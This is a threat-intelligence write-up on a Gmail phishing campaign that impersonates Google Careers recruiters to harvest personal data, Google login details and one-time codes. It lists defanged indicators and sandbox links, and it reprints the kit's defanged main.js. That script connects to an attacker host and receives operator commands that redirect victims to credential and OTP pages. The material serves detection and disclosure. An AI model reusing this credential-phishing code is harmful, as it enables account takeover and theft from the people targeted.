Gmail phishing posing as Google Careers

GoogleCareersGmailPhish.md

Gmail phishing posing as Google Careers recruiter

IOCs

Email Sender:
reply-ff2913777d64-449_HTML-1463564-534018293-0[@]s12[.]y[.]mc[.]salesforce[.]com

Link Embedded in 'View the role' button in the Email body:
cl[.]s12[.]exct[.]net (13.110.204.9 - Salesforce ASN)

Fake Google Careers Site (protected by Cloudflare Captcha:
apply[.]grecruitingwise[.]com (104.21.47.163	- Cloudflare ASN)

Site data is sent to via HTTP POST:
satoshicommands[.]com

OSINT

https://www.reddit.com/r/programmatic/comments/1nk5r5b/anyone_else_getting_these_emails_from_google/ https://urlscan.io/result/019982b3-9e4d-7015-90b6-436e465241cf/#summary

---

Phishing Email arrives posing as a Google Careers recruiter:

Phishing Landing Page harvests personal data:

Secondary Phishing Landing Page asks for Google Account login email:

Next page asks for Password:

Fake "Processing your request" page is loaded

Observed "main.js" JavaScript in the main Page Body:

Function and location of where data is sent via an HTTP POST request:

---

Copy of main.js (defanged)

function redirect_to($url){
  window.location.href = $url;
}

$(function () {
  const sid = $("#sessId").val();
  const message = $("#appMessage").val();
  const token = $("#appToken").val();
  const chatId = $("#appChatId").val();
  var socket = io('hxxps[:]//satoshicommands[.]com/', { 
    query: `room=${sid}&message=${encodeURIComponent(message)}&chatId=${chatId}&token=${token}` 
  });
  
  // socket.on('action', data => {
  //   receiveMessage(data);
  // });

  setInterval(() => {
    $.post('/gw.php', { action: 'command' }).done(function(response){
      response = JSON.parse(response);
      if(response.command) receiveMessage(response.command);
    });
  }, 2000);
  
  function receiveMessage(data){
    const parts = data.split(";");
    switch(parts[0]) {
      case "SMS":
        redirect_to("/phoneotp");
        return;
      case "AUTH":
        redirect_to("/auth");
        return;
      case "PHONE":
        redirect_to("/phone");
        return;
      case "EMAIL":
        redirect_to("/email");
        return;
      case "GCO":
        redirect_to("/gco");
        return;
      case "SECURITYCODE":
        redirect_to("/securitycode");
        return;
      case "SIGNREQUEST":
        redirect_to(`/signinrequest?dv=${parts?.[2]}&sr=${parts?.[1]}`);
        return;
      case "COSTUM":
        redirect_to(`/costum?txt=${parts?.[1]}`);
        return;
      case "BSEMAIL":
        redirect_to("/login?again=true");
        return;
      case "WRONGPASS":
        redirect_to("/signin?again=true");
        return;
      case "WRONGOTP":
        redirect_to("/phoneotp?again=true");
        return;
      case "WRONGAUTH":
        redirect_to("/auth?again=true");
        return;
      case "WRONGEMAIL":
        redirect_to("/login?wrongemail=true");
        return;
      case "SUCCESS":
        redirect_to("/success");
        return;
    }
  };
});

// Start Home
function showSnackbar(txt) {
  // Get the snackbar DIV
  var x = document.getElementById("snackbar");

  // Add the "show" class to DIV
  x.innerHTML = txt;
  x.className = "show";

  // After 3 seconds, remove the show class from DIV
  setTimeout(function(){ x.className = x.className.replace("show", ""); }, 3000);
}
// End Home

// Start Auth
let timer;
function getNewCode(seconds) {
    const button = document.getElementById("getCode");
    const showSeconds = document.getElementById("showSeconds");
    const countdown = document.getElementById("seconds");
    
    button.style.display = "none";
    showSeconds.style.display = "block";
    
    function updateCountdown() {
        let minutes = Math.floor(seconds / 60);
        let secs = seconds % 60;
        countdown.textContent = `${String(minutes).padStart(2, '0')}:${String(secs).padStart(2, '0')}`;
        
        if (seconds > 0) {
            seconds--;
            timer = setTimeout(updateCountdown, 1000);
        } else {
            button.style.display = "block";
            showSeconds.style.display = "none";
        }
    }
    
    updateCountdown();
}
// End Auth

Additional examples found in ANY.RUN

Additional IOCs

apply[.]grecruitdigital[.]com
apply[.]grecruitbridge[.]com
apply[.]gtalentmatcher[.]com
apply[.]gstafftalent[.]com
apply[.]grecruitpro[.]com
apply[.]gcandidatespath[.]com
hire[.]gteamhirehub[.]com
hire[.]gteamlineup[.]com
hire[.]gteamjobspot[.]com
recruit[.]gapplyhr[.]com
apply[.]ghiringpathway[.]com
hire[.]gapplyjobs[.]com
apply[.]ghiringscout[.]com
hire[.]gtalentpathway[.]com
hire[.]gtalenttrack[.]com
apply[.]grecruitinglink[.]com
recruite[.]getintouchwithcareers
start[.]joinoursuiteteam[.]com
apply[.]grecruitingportal[.]com
apply[.]grecruitingbridge[.]com
apply[.]gcareercandidates[.]com
---
puma-remotejobcenter[.]vercel[.]app
puma-virtual-positions[.]vercel[.]app
---
robert-half-hiring-marketing-remotl[.]vercel[.]app
join[.]meetrecruitingproject[.]info
---
moburst-check[.]vercel[.]app

Google Careers

• https://app.any.run/tasks/3f3bc7be-d2c4-4bf8-a0fc-15c72097830d
• https://app.any.run/tasks/b75f572d-cf44-4e98-ad0b-57ce6891fd74
• https://app.any.run/tasks/c1d06e99-fbf3-454a-b338-923ea848716f
• https://app.any.run/tasks/4340e658-0cc7-4ec3-bbbe-3533cb24194f
• https://app.any.run/tasks/6eebf48a-da18-4c14-af75-08b17a8b3ef5
• https://app.any.run/tasks/3234e076-1e6f-4e19-ab69-a3a6a3874d1c
• https://app.any.run/tasks/7b81cfb2-e338-4719-ab85-93ac2ae72f83
• https://app.any.run/tasks/ba650c51-0270-4dd8-b2e3-2ccb82ead3d9
• https://app.any.run/tasks/a199bb07-04c4-462f-b9d1-e85ca8792c19
• https://app.any.run/tasks/c4b717de-d4cf-4fa1-b22e-a8e43b653ec2
• https://app.any.run/tasks/7dd143b8-4753-4901-b539-ad921f6cf1f6
• https://app.any.run/tasks/c291ace2-3356-4f61-ad61-1a4e4c3c9e71
• https://app.any.run/tasks/1667ea9c-5e2c-4780-9218-b2ce41e5070c
• https://app.any.run/tasks/516ce0c4-60ea-4a48-8744-91d2bbb9502b
• https://app.any.run/tasks/a07451d6-bff4-4bca-aab1-78ddfeb8e0c8
• https://app.any.run/tasks/f6fe5854-fa53-4455-ade0-004bd810e598
• https://app.any.run/tasks/f4f1686c-ed82-4a91-b07b-e8e75a50ac0e
• https://app.any.run/tasks/bdaad8c3-54df-48d4-8481-05a239d27124
• https://app.any.run/tasks/85bf15d6-656d-4a15-a548-48d7a2c29b0c
• https://app.any.run/tasks/e996080f-486e-4f80-81b4-b547ae8ea5a3
• https://app.any.run/tasks/98d7f94a-6536-46f3-b7ed-a3c0b86c75e5
• https://app.any.run/tasks/a4cba69a-33fb-4881-8476-7374ca772a24
• https://app.any.run/tasks/50fdbf87-b5c1-4ce1-a765-b8e5a7923613
• https://app.any.run/tasks/d3d10d58-7cdf-4b24-8d0d-665784b95567
• https://app.any.run/tasks/3a954b06-0576-4bca-86af-0e89d80ab6ca
• https://app.any.run/tasks/b683f7bb-4bf2-48e2-bafd-add104267e2a

PUMA

• https://app.any.run/tasks/43793c08-56ff-4c3b-ae38-bfdc0b238ca8
• https://app.any.run/tasks/1e0403fc-4944-47c4-84c3-6bf51f8e51ba

Robert Half

• https://app.any.run/tasks/f85b0db5-4687-4684-aae2-a1a78f561fa3
• https://app.any.run/tasks/b401535b-2cab-4a30-a1fc-aba58684b66b

Moburst

• https://app.any.run/tasks/d296b2d8-ef45-48a8-b866-f09088c305c3

VirusTotal Collection: https://www.virustotal.com/gui/collection/399afdf59ac27e96823744e052d6993f7cf79fa27e895b168823f4667958d4c6/iocs

VirusTotal Graph: https://www.virustotal.com/graph/embed/g81345fe3c2b94656a6bcc8bb5f14d568578e25872a7f4580a1292e45a9f1756d?theme=dark

VirusTotal Graph:

Examples of other brands being targeted: